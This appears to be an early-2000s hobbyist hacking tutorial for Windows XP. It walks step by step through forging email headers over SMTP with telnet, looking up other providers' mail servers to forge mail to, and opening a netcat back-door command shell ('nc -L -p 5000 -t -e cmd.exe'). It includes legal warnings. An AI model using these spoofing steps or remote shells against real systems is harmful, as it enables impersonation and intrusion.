The key to doing amazing things with XP is as simple as D O S.

Yes, that's right, DOS as in MS-

DOS, as in MicroSoft Disk Operating System. Windows XP (as well as NT and 2000) comes
with two versions of DOS. Command.com is an old DOS version. Various versions of
command.com come with Windows 95, 98, SE, ME, Window 3, and DOS only operating
systems.

The other DOS, which comes only with the XP, 2000 and NT operating systems, is cmd.exe.
Usually cmd.exe is better than command.com because it is easier to use, has more commands,
and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For
example, you can repeat a command by using the up arrow until you back up to the desired
command. Unlike bash, however, your DOS command history is erased whenever you shut down
cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won?t run
right in cmd.exe will work in command.com

****************
Flame Alert: Some readers are throwing fits because I dared to compare DOS to bash. I can
compare cmd.exe to bash if I want to. Nanny nanny nah nah.
****************

DOS is your number one Windows gateway to the Internet, and the open sesame to local area
networks. From DOS, without needing to download a single hacker program, you can do
amazingly sophisticated explorations and even break into poorly defended computers.

****************
You can go to jail warning: Breaking into computers is against the law if you do not have
permission to do so from the owner of that computer. For example, if your friend gives you
permission to break into her Hotmail account, that won't protect you because Microsoft owns
Hotmail and they will never give you permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for bringing up a
DOS prompt on a computer. Be sure to get a teacher's WRITTEN permission before
demonstrating that you can hack on a school computer.
****************

So how do you turn on DOS?

Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying something like
this:

Microsoft Windows XP [Version 5.1.2600]

(C) © 1985-2001 Microsoft Corp.

C:\>
Your first step is to find out what commands you can run in DOS. If you type "help" at the DOS
prompt, it gives you a long list of commands. However, this list leaves out all the commands
hackers love to use. Here are some of those left out hacker commands.

TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):

nbtstat
net use
net view
net localgroup

TCP/IP stands for transmission control protocol/Internet protocol. As you can guess by the name,
TCP/IP is the protocol under which the Internet runs. along with user datagram protocol (UDP).
So when you are connected to the Internet, you can try these commands against other Internet
computers. Most local area networks also use TCP/IP.

NetBIOS (Net Basic Input/Output System) protocol is another way to communicate between
computers. This is often used by Windows computers, and by Unix/Linux type computers
running Samba. You can often use NetBIOS commands over the Internet (being carried inside
of, so to speak, TCP/IP). In many cases, however, NetBIOS commands will be blocked by
firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using
them. We will cover NetBIOS commands in the next Guide to XP Hacking.

How to Forge Email

Want a computer you can telnet into and mess around with, and not get into trouble no matter
what you do to it? I've set up my techbroker.com (206.61.52.33) with user xyz, password testtest
for you to play with. Here's how to forge email to xyz@techbroker.com using telnet. Start with
clicking start --> run --> Command.com or cmd.com and give the command:

C:\>telnet techbroker.com 25 (in Windows 98 or earlier there will be a box into which you put
the port 25 number)

Connecting To Techbroker.com

220 <techbroker.com> Service ready

Now you type in who you want the message to appear to come from:
helo santa@techbroker.com
Techbroker.com will answer:

250 <techbroker.com> host ready

Next type in your mail from address:

mail from:santa@techbroker.com

250 Requested mail action okay, completed

Your next command:

rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed

Your next command:

data

354 Start main input; end with <CRLF>.<CRLF>

Newbie note: <CRLF> just means hit return. In case you can't see that little period between the
<CRLF>s, what you do to end composing your email is to hit enter, type a period, then hit enter
again.

Anyhow, try typing:

This is a test.
.

250 Requested mail action okay, completed

quit

221 <techbroker.com> Service closing transmission channel

Connection to host lost.

Using techbroker's mail server, even if you enable full headers, the message we just composed
looks like:

Status: R
X-status: N

This is a test.
That's a pretty pathetic forged email, huh? No "from", no date. However, you can make your
headers better by using a trick with the data command. After you give it, you can insert as many
headers as you choose. The trick is easier to show than explain:

220 <techbroker.com> Service ready

helo santa@northpole.org
250 <techbroker.com> host ready
mail from:santa@northpole.com
250 Requested mail action okay, completed
rcpt to:xyz@techbroker.com
250 Requested mail action okay, completed
data
from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.
.

250 Requested mail action okay, completed

quit
221 <techbroker.com> Service closing transmission channel

Connection to host lost.

The message then looks like:

from:santa@deer.northpole.org
Date: Mon, 21 Oct 2002 10:09:16 -0500
Subject: Rudolf
This is a Santa test.

The trick is to start each line you want in the headers with one word followed by a colon, and the
a line followed by "return". As soon as you write a line that doesn't begin this way, the rest of
what you type goes into the body of the email.

Notice that the santa@northpole.com from the "mail from:" command didn't show up in the
header. Some mail servers would show both "from" addresses.

You can forge email on techbroker.com within one strict limitation.

Your email has to go to someone at techbroker.com. If you can find any way to send email to
someone outside techbroker, let us know, because you will have broken our security, muhahaha!
Don't worry, you have my permission.

Next, you can read the email you forge on techbroker.com via telnet.
First, some of the people who read email on this account have gotten infected with viruses,
which in turn have sent viruses to this account. So you antivirus program will go nuts when
reading lots of the email here. To read *just* the email you just forged, you will first want to find
out how many emails total are in this account. Most of them will just be viruses. Yours will be
the last or almost last (more viruses will come in often) in the account.

C:\>telnet techbroker.com 110

+OK <30961.5910984301@techbroker.com> service ready

Give this command:

user xyz
+OK user is known

Then type in this:

pass testtest
+OK mail drop has 112 message(s)

OK, so do you want to make sure that message 112 is yours and not some virus? here is how to
tell. Long messages are usually viruses. Yours, presumably, was short. Here is the command that
tells you how long the messages are: UIDL. The numbers will include letters of the alphabet, A,
B, C, D, E and F and look like this:, with the number of the message on the left hand column:

105 410F821D
106 0013EF7F
107 158D4208
108 099C70B4
109 3E4E611B
110 2A726505
111 69D74CB4

This is hexadecimal, the base 16 numbering scheme used by many things having to do with
computers. You don't have to do anything fancy to figure out what that hexadecimal number
means in order to identify the size of your email if you used common sense and made it little.

In any case, if you use telnet to read an email that holds a virus, despite your antivirus program
acting nuts, it won't infect your computer so don't worry.

All that said, here's how to read email using telnet.

retr 1
+OK message follows
This is a test.

If you want to know all possible commands for using telnet on a POP email server, give this
command:
help
+OK help list follows
USER user
PASS password
STAT
LIST [message]
RETR message
DELE message
NOOP
RSET
QUIT
APOP user md5
TOP message lines
UIDL [message]
HELP

Of course you could use your own email client program to download email from this account,
and you have my permission to download and delete all the email you want as well as forge it.
However, doing it this way instead of via telnet is boring and most unhackerly.

Unless you use a weird online provider like AOL, you can use these same tricks to send and
receive your own email. Or you can forge email to a friend by telnetting to his or her online
provider's email sending computer(s). You may not be able to do this with any random email
server, but you may be surprised to find out how many will let you do this.

How to Use Win XP's Nslookup to Forge Email

With most online providers you need to get the exact name of their
email computer(s). Often it is simply mail.targetcomputer.com
(substitute the name of the online provider for targetcomputer). If
this doesn't work, you can find out the name of their email server
with the DOS nslookup program, which only runs from cmd.exe.
Here's an example:

C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

> set q=mx

> dimensional.com
Server: DNS1.wurld.net
Address: 206.61.52.11

dimensional.com MX preference = 5, mail exchanger =

mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =
mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =
mx3.dimensional.com
dimensional.com nameserver = ns.dimensional.com
dimensional.com nameserver = ns-1.dimensional.com
dimensional.com nameserver = ns-2.dimensional.com
dimensional.com nameserver = ns-3.dimensional.com
dimensional.com nameserver = ns-4.dimensional.com
mail.dimensional.com internet address = 206.124.0.11
mx2.dimensional.com internet address = 206.124.0.30
mx3.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.10
ns.dimensional.com internet address = 206.124.26.254
ns.dimensional.com internet address = 206.124.0.254
ns.dimensional.com internet address = 206.124.1.254
ns.dimensional.com internet address = 209.98.32.54
ns.dimensional.com internet address = 206.124.0.32
ns.dimensional.com internet address = 206.124.0.30
ns.dimensional.com internet address = 206.124.0.25
ns.dimensional.com internet address = 206.124.0.15
ns.dimensional.com internet address = 206.124.0.21
ns.dimensional.com internet address = 206.124.0.9
ns-1.dimensional.com internet address = 206.124.26.254
ns-2.dimensional.com internet address = 209.98.32.54
ns-3.dimensional.com internet address = 206.124.1.254
ns-4.dimensional.com internet address = 206.124.0.254
>

The lines that tell you what computers will let you forge email to
people with @dimensional.com addresses are:

dimensional.com MX preference = 5, mail exchanger =

mail.dimensional.com
dimensional.com MX preference = 10, mail exchanger =
mx2.dimensional.com
dimensional.com MX preference = 20, mail exchanger =
mx3.dimensional.com

MX stands for mail exchange. The lower the preference number, the more they would like you to
use that address for email.If that lowest number server is too busy, then try another server.

Sometimes when you ask about a mail server, nslookup will give you this kind of error message:

DNS request timed out.

timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to [207.217.120.202] timed-out

To get around this problem, you need to find out what are the domain servers for your target
online provider. A good place to start looking is http://netsol.com/cgi-bin/whois/whois . If this
doesn't work, see http://happyhacker.org/HHA/fightback.shtml for how to find the domain
servers for any Internet address.

****************
Newbie note: A domain name server provides information on the names and numbers assigned to
computers on the Internet. For example, dns1.wurld.net and dns2.wurld.net contain information
on
happyhacker.org, techbroker.com, securitynewsportal.com, thirdpig.com and sage-inc.com.
When you query dns1.wurld.net about other computers, it might have to go hunting for that
information from other name servers. That's why you might get a timed out failure.
***************

Once you know the domain servers for an online service, set one of
them for the server for your nslookup program. Here's how you do it:

C:\ >nslookup
Default Server: DNS1.wurld.net
Address: 206.61.52.11

Now give the command:

> server 207.217.126.41

Default Server: ns1.earthlink.net
Address: 207.217.126.41

Next command should be:

> set q=mx
> earthlink.net
Server: ns1.earthlink.net
Address: 207.217.126.41

earthlink.net MX preference = 5, mail exchanger = mx04.earthlink.net

earthlink.net MX preference = 5, mail exchanger = mx05.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx06.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx00.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx01.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx02.earthlink.net
earthlink.net MX preference = 5, mail exchanger = mx03.earthlink.net
earthlink.net nameserver = ns3.earthlink.net
earthlink.net nameserver = ns1.earthlink.net
earthlink.net nameserver = ns2.earthlink.net
mx00.earthlink.net internet address = 207.217.120.28
mx01.earthlink.net internet address = 207.217.120.29
mx02.earthlink.net internet address = 207.217.120.79
mx03.earthlink.net internet address = 207.217.120.78
mx04.earthlink.net internet address = 207.217.120.249
mx05.earthlink.net internet address = 207.217.120.31
mx06.earthlink.net internet address = 207.217.120.23
ns1.earthlink.net internet address = 207.217.126.41
ns2.earthlink.net internet address = 207.217.77.42
ns3.earthlink.net internet address = 207.217.120.43
>

Your own online service will usually not mind and may even be glad if you use telnet to read
your email. Sometimes a malicious person or faulty email program will send you a message that
is so screwed up that your email program can't download it. With telnet you can manually delete
the bad email. Otherwise tech support has to do it for you.

If you think about it, this ability to forge email is a huge

temptation to spammers. How can your online provider keep the bad guys from filling up a
victim's email box with garbage? The first time a bad guy tries this, probably nothing will stop
him or her. The second time the online provider might block the bad guy at the firewall, maybe
call the bad guy's online provider and kick him or her and maybe get the bad guy busted or sued.

**************
You can go to jail warning: Sending hundreds or thousands of junk
emails to bomb someone's email account is a felony in the US.
***************

***************
You can get sued warning: Spamming, where you send only one email to each person, but send
thousands or millions of emails, is borderline legal. However, spammers have been successfully
sued when they forge the email addresses of innocent people as senders of their spam.
****************

Now that you know how to read and write email with telnet, you
definitely have something you can use to show off with. Happy hacking!

Whoops, wait just one minute. If you want to be an advanced XP hacker, you need to learn how
to use netcat! -->

How to Use Netcat

Oh, here's one last goodie for advanced users. Get netcat for Windows. It's a free program
written by Weld Pond and Hobbit, and available from many sites, for example
http://www.atstake.com/research/tools/#network_utilities . It is basically telnet on steroids. For
example, using netcat, you can set up a port -- also known as a back door, depending on your
motivation -- that will allow people to telnet into a DOS shell. Use this command:

C:\>nc -L -p 5000 -t -e cmd.exe

You can specify a different port number than 5000. Just make sure it doesn't conflict with
another port by checking with the netstat
command. Then you and your friends, enemies and random losers can either telnet in or netcat in
with the command:

C:\>nc -v [ipaddress of target] [port]

Of course you will probably get hacked for setting up this port. However, if you set up a sniffer
to keep track of the action, you can turn this scary back door into a fascinating honeypot. For
example, you could run it on port 23 and watch all the hackers who attack with telnet hoping to
log in. With some programming you could even fake a unix-like login sequence and play some
tricks on your attackers.

For more on how to hack with telnet, see the Beginners Guide #8 at
http://www.happyhacker.org/gtmhh/begin11.shtml